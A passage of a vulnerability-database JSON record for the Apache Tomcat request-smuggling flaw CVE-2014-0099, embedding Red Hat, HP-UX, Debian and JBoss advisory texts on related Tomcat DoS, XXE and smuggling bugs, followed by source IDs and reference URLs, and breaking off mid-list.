tomcat6 security update\nAdvisory ID:       RHSA-2014:0833-01\nProduct:           Red Hat JBoss Web Server\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-0833.html\nIssue date:        2014-07-03\nCVE Names:         CVE-2014-0075 CVE-2014-0096 CVE-2014-0099 \n=====================================================================\n\n1. Summary:\n\nAn update for the Apache Tomcat 6 component for Red Hat JBoss Web Server\n2.0.1 that fixes three security issues is now available from the Red Hat\nCustomer Portal. \n\nThe Red Hat Security Response Team has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. \n\nIt was discovered that Apache Tomcat did not limit the length of chunk\nsizes when using chunked transfer encoding. A remote attacker could use\nthis flaw to perform a denial of service attack against Tomcat by streaming\nan unlimited quantity of data, leading to excessive consumption of server\nresources. (CVE-2014-0075)\n\nIt was found that Apache Tomcat did not check for overflowing values when\nparsing request content length headers. \n(CVE-2014-0099)\n\nIt was found that the org.apache.catalina.servlets.DefaultServlet\nimplementation in Apache Tomcat allowed the definition of XML External\nEntities (XXEs) in provided XSLTs. A malicious application could use this\nto circumvent intended security restrictions to disclose sensitive\ninformation. (CVE-2014-0096)\n\nThe CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product\nSecurity. \n\nAll users of Red Hat JBoss Web Server 2.0.1 as provided from the Red Hat\nCustomer Portal are advised to apply this update. The Red Hat JBoss Web\nServer process must be restarted for the update to take effect. \n\n3. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1072776 - CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter\n1088342 - CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs\n1102030 - CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header\n\n5. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0075.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0096.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0099.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver\u0026downloadType=securityPatches\u0026version=2.0.1\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTtaPdXlSAg2UNWIIRAhrCAKC1npkA9rY3/60CBN59GnEynLsgggCfT0zg\nTUqsunatvAtbihs+9jH0Lhg=\n=AdmM\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04483248\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04483248\nVersion: 1\n\nHPSBUX03150 SSRT101681 rev.1 - HP-UX Apache Server Suite running Apache\nTomcat or PHP, Remote Denial of Service (DoS) and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-10-20\nLast Updated: 2014-10-20\n\nPotential Security Impact: Remote Denial of Service (DoS), man-in-the-middle\n(MitM) attack, HTTP request smuggling, modification of data; local\nmodification of data\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with the HP-UX Apache\nWeb Server Suite, Tomcat Servlet Engine, and PHP. These could be exploited\nremotely to create a Denial of Service (DoS) and other vulnerabilities. \n\nReferences:\n\nCVE-2013-4248 - PHP: man-in-the-middle (MitM) attack\n\nCVE-2013-4286 - Tomcat: remote HTTP request smuggling\n\nCVE-2013-6438 - Tomcat: remote Denial of Service (DoS)\n\nCVE-2014-0075 - Tomcat: remote Denial of Service (DoS)\n\nCVE-2014-0098 - Tomcat: remote Denial of Service (DoS)\n\nCVE-2014-0099 - Tomcat: remote HTTP request smuggling\n\nCVE-2014-3981 - PHP: local modification of data\n\nSSRT101681\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.23 running HP-UX Apache Web Server Suite v3.29 or earlier\n\nHP-UX B.11.23 running Tomcat v5.5.36.01 or earlier\n\nHP-UX B.11.23 running PHP v5.2.17.03 or earlier\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2013-4248    (AV:N/AC:M/Au:N/C:N/I:P/A:N)       4.3\nCVE-2013-4286    (AV:N/AC:M/Au:N/C:P/I:P/A:N)       5.8\nCVE-2013-6438    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2014-0075    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2014-0098    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2014-0099    (AV:N/AC:M/Au:N/C:N/I:P/A:N)       4.3\nCVE-2014-3981    (AV:L/AC:M/Au:N/C:N/I:P/A:P)       3.3\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following software updates to resolve the\nvulnerabilities. \n\nThe updates are available for download from http://software.hp.com\n\nNOTE: HP-UX Web Server Suite v3.30 HPUXWSATW330 contains Apache v2.2.15.21,\nTomcat Servlet Engine 5.5.36.02, and PHP 5.2.17.04\n\nHP-UX 11i Release\n Apache Depot name\n\nB.11.23 (11i v2 32-bit)\n HP_UX_11.23_HPUXWS22ATW-B330-11-23-32.depot\n\nB.11.23 (11i v2 64-bit)\n HP_UX_11.23_HPUXWS22ATW-B330-11-23-64.depot\n\nMANUAL ACTIONS: Yes - Update\nInstall HP-UX Web Server Suite v3.30 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\n==================\nhpuxws22APCH32.APACHE\nhpuxws22APCH32.APACHE2\nhpuxws22APCH32.AUTH_LDAP\nhpuxws22APCH32.AUTH_LDAP2\nhpuxws22APCH32.MOD_JK\nhpuxws22APCH32.MOD_JK2\nhpuxws22APCH32.MOD_PERL\nhpuxws22APCH32.MOD_PERL2\nhpuxws22APCH32.PHP\nhpuxws22APCH32.PHP2\nhpuxws22APCH32.WEBPROXY\nhpuxws22APCH32.WEBPROXY2\nhpuxws22APACHE.APACHE\nhpuxws22APACHE.APACHE2\nhpuxws22APACHE.AUTH_LDAP\nhpuxws22APACHE.AUTH_LDAP2\nhpuxws22APACHE.MOD_JK\nhpuxws22APACHE.MOD_JK2\nhpuxws22APACHE.MOD_PERL\nhpuxws22APACHE.MOD_PERL2\nhpuxws22APACHE.PHP\nhpuxws22APACHE.PHP2\nhpuxws22APACHE.WEBPROXY\nhpuxws22APACHE.WEBPROXY2\nhpuxws22TOMCAT.TOMCAT\naction: install revision B.2.2.15.21 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 20 October 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 6.0.45+dfsg-1~deb7u1. Description:\n\nRed Hat JBoss BPM Suite is a business rules and processes management system\nfor the management, storage, creation, modification, and deployment of\nJBoss rules and BPMN2-compliant business processes. \n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss BPM\nSuite 6.0.3, and includes bug fixes and enhancements. It includes various\nbug fixes, which are listed in the README file included with the patch\nfiles. \n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section. \n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2013-4002 xerces-j2: Xerces-J2 OpenJDK: XML parsing Denial of Service\n(JAXP, 8017298)\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0005 security: PicketBox/JBossSX: Unauthorized access to and\nmodification of application server configuration and state by application\n\nCVE-2014-0075 jbossweb: tomcat: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0096 jbossweb: Apache Tomcat: XXE vulnerability via user supplied\nXSLTs\n\nCVE-2014-0099 jbossweb: Apache Tomcat: Request smuggling via malicious\ncontent length header\n\nCVE-2014-0119 jbossweb: Apache Tomcat 6: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-3472 jboss-as-controller: JBoss AS Security: Invalid EJB caller\nrole check implementation\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3558 hibernate-validator: Hibernate Validator: JSM bypass via\nReflectionHelper\n\nCVE-2014-3578 spring: Spring Framework: Directory traversal\n\nCVE-2014-3625 spring: Spring Framework: directory traversal flaw\n\nCVE-2014-3682 jbpm-designer: XXE in BPMN2 import\n\nCVE-2014-8114 UberFire: Information disclosure and RCE via insecure file\nupload/download servlets\n\nCVE-2014-8115 KIE Workbench: Insufficient authorization constraints\n\nRed Hat would like to thank James Roper of Typesafe for reporting the\nCVE-2014-0193 issue, CA Technologies for reporting the CVE-2014-3472 issue,\nAlexander Papadakis for reporting the CVE-2014-3530 issue, and David Jorm\nfor reporting the CVE-2014-8114 and CVE-2014-8115 issues. Bugs fixed (https://bugzilla.redhat.com/):\n\n1019176 - CVE-2013-4002 Xerces-J2 OpenJDK: XML parsing Denial of Service (JAXP, 8017298)\n1049736 - CVE-2014-0005 PicketBox/JBossSX: Unauthorized access to and modification of application server configuration and state by application\n1065139 - CVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of user-supplied content in outputText tags and EL expressions\n1072776 - CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter\n1088342 - CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs\n1092783 - CVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n1102030 - CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header\n1102038 - CVE-2014-0119 Tomcat/JBossWeb: XML parser hijack by malicious web application\n1103815 - CVE-2014-3472 JBoss AS Security: Invalid EJB caller role check implementation\n1107901 - CVE-2014-3490 RESTEasy: XXE via parameter entities\n1109196 - CVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter\n1112987 - CVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n1120495 - CVE-2014-3558 Hibernate Validator: JSM bypass via ReflectionHelper\n1129074 - CVE-2014-3577 Apache HttpComponents client / Apache CXF: SSL hostname verification bypass, incomplete CVE-2012-6153 fix\n1129916 - CVE-2012-6153 Apache HttpComponents client / Apache CXF: SSL hostname verification bypass, incomplete CVE-2012-5783 fix\n1131882 - CVE-2014-3578 Spring Framework: Directory traversal\n1148260 - CVE-2014-3682 jbpm-designer: XXE in BPMN2 import\n1165936 - CVE-2014-3625 Spring Framework: directory traversal flaw\n1169544 - CVE-2014-8114 UberFire: Information disclosure and RCE via insecure file upload/download servlets\n1169545 - CVE-2014-8115 KIE Workbench: Insufficient authorization constraints\n\n5",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0099"
      },
      {
        "db": "BID",
        "id": "67668"
      },
      {
        "db": "PACKETSTORM",
        "id": "130616"
      },
      {
        "db": "PACKETSTORM",
        "id": "127681"
      },
      {
        "db": "PACKETSTORM",
        "id": "130430"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "126842"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "db": "PACKETSTORM",
        "id": "136437"
      },
      {
        "db": "PACKETSTORM",
        "id": "130429"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-0099",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "67668",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "59678",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60793",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59835",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59849",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59121",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59732",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59873",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60729",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1030302",
        "trust": 1.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588",
        "trust": 0.6
      },
      {
        "db": "JUNIPER",
        "id": "JSA10657",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "130616",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127681",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130430",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130617",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126842",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127336",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128783",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136437",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130429",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "67668"
      },
      {
        "db": "PACKETSTORM",
        "id": "130616"
      },
      {
        "db": "PACKETSTORM",
        "id": "127681"
      },
      {
        "db": "PACKETSTORM",
        "id": "130430"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "126842"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "db": "PACKETSTORM",
        "id": "136437"
      },
      {
        "db": "PACKETSTORM",
        "id": "130429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-588"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "id": "VAR-201405-0541",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.44401007833333334
  },
  "last_update_date": "2024-07-23T21:10:24.545000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-189",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0099"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://tomcat.apache.org/security-6.html"
      },
      {
        "trust": 2.0,
        "url": "http://tomcat.apache.org/security-7.html"
      },
      {
        "trust": 2.0,
        "url": "http://tomcat.apache.org/security-8.html"
      },
      {
        "trust": 1.9,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 1.8,
        "url": "http://advisories.mageia.org/mgasa-2014-0268.html"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=144498216801440\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/archive/1/532221/100/0/threaded"
      },
      {
        "trust": 1.6,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-february/150282.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.debian.org/security/2016/dsa-3447"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/archive/1/532218/100/0/threaded"
      },
      {
        "trust": 1.6,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0675.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.securitytracker.com/id/1030302"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141017844705317\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60729"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59121"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59732"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2014/may/138"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59678"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59835"
      },
      {
        "trust": 1.6,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04851013"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:052"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:053"
      },
      {
        "trust": 1.6,
        "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/bid/67668"
      },
      {
        "trust": 1.6,
        "url": "http://linux.oracle.com/errata/elsa-2014-0865.html"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681528"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141390017113542\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1580473"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59873"
      },
      {
        "trust": 1.6,
        "url": "http://www.debian.org/security/2016/dsa-3530"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2014/dec/23"
      },
      {
        "trust": 1.6,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1578814"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:084"
      },
      {
        "trust": 1.6,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1578812"
      },
      {
        "trust": 1.6,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0720.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59849"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2014/may/140"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680603"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678231"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60793"
      },
      {
        "trust": 1.6,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0765.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/37220405a377c0182d2afdbc36461c4783b2930fbeae3a17f1333113%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/39ae1f0bd5867c15755a6f959b271ade1aea04ccdc3b2e639dcd903b%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/b84ad1258a89de5c9c853c7f2d3ad77e5b8b2930be9e132d5cef6b95%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/b8a1bf18155b552dcf9a928ba808cbadad84c236d85eab3033662cfb%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r03c597a64de790ba42c167efacfa23300c3d6c9fe589ab87fe02859c%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r587e50b86c1a96ee301f751d50294072d142fd6dc08a8987ae9f3a9b%40%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0099"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0075"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0096"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/37220405a377c0182d2afdbc36461c4783b2930fbeae3a17f1333113@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/39ae1f0bd5867c15755a6f959b271ade1aea04ccdc3b2e639dcd903b@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/b8a1bf18155b552dcf9a928ba808cbadad84c236d85eab3033662cfb@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/b84ad1258a89de5c9c853c7f2d3ad77e5b8b2930be9e132d5cef6b95@%3cdev.tomcat.apache.org%3e"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0119"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0227"
      },
      {
        "trust": 0.4,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0833.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.apache.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682740"
      },
      {
        "trust": 0.3,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg21686477"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678231"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0843.html"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10657\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100182149"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21681528"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04851013"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04223376"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04483248"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684910"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677448"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678135"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0842.html"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0827.html"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0834.html"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0835.html"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0836.html"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683334"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004849"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682393"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004867"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004860"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683430"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683445"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677222"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680603"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684768"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679568"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21691579"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004997"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020714"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21691580"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676983"
      },
      {
        "trust": 0.3,
        "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15432.html?ref=rss"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678892"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685137"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4286"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/en/support/security/"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/en/support/security/advisories/"
      },
      {
        "trust": 0.2,
